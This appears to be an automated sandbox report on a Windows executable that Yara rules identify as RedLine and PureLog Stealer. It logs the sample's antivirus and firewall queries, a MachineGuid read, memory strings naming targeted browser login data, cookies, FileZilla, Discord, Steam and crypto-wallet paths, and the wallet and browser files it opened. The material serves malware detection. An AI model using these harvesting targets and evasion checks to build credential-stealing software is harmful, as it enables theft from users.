Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Users\user\Desktop\lWnSA7IyVc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: lWnSA7IyVc.exe, 00000002.00000002.1868707431.0000000001406000.00000004.00000020.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1877202166.0000000006AC0000.00000004.00000020.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1880801732.0000000007B09000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.50e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.25ad31c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1687881526.00000000050E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1684656014.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 2.2.lWnSA7IyVc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.35524c8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.36f37f8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lWnSA7IyVc.exe PID: 2008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lWnSA7IyVc.exe PID: 3808, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: lWnSA7IyVc.exe, 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: lWnSA7IyVc.exe, 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: lWnSA7IyVc.exe, 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: lWnSA7IyVc.exe, 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: lWnSA7IyVc.exe, 00000000.00000002.1687881526.00000000050E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\lWnSA7IyVc.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
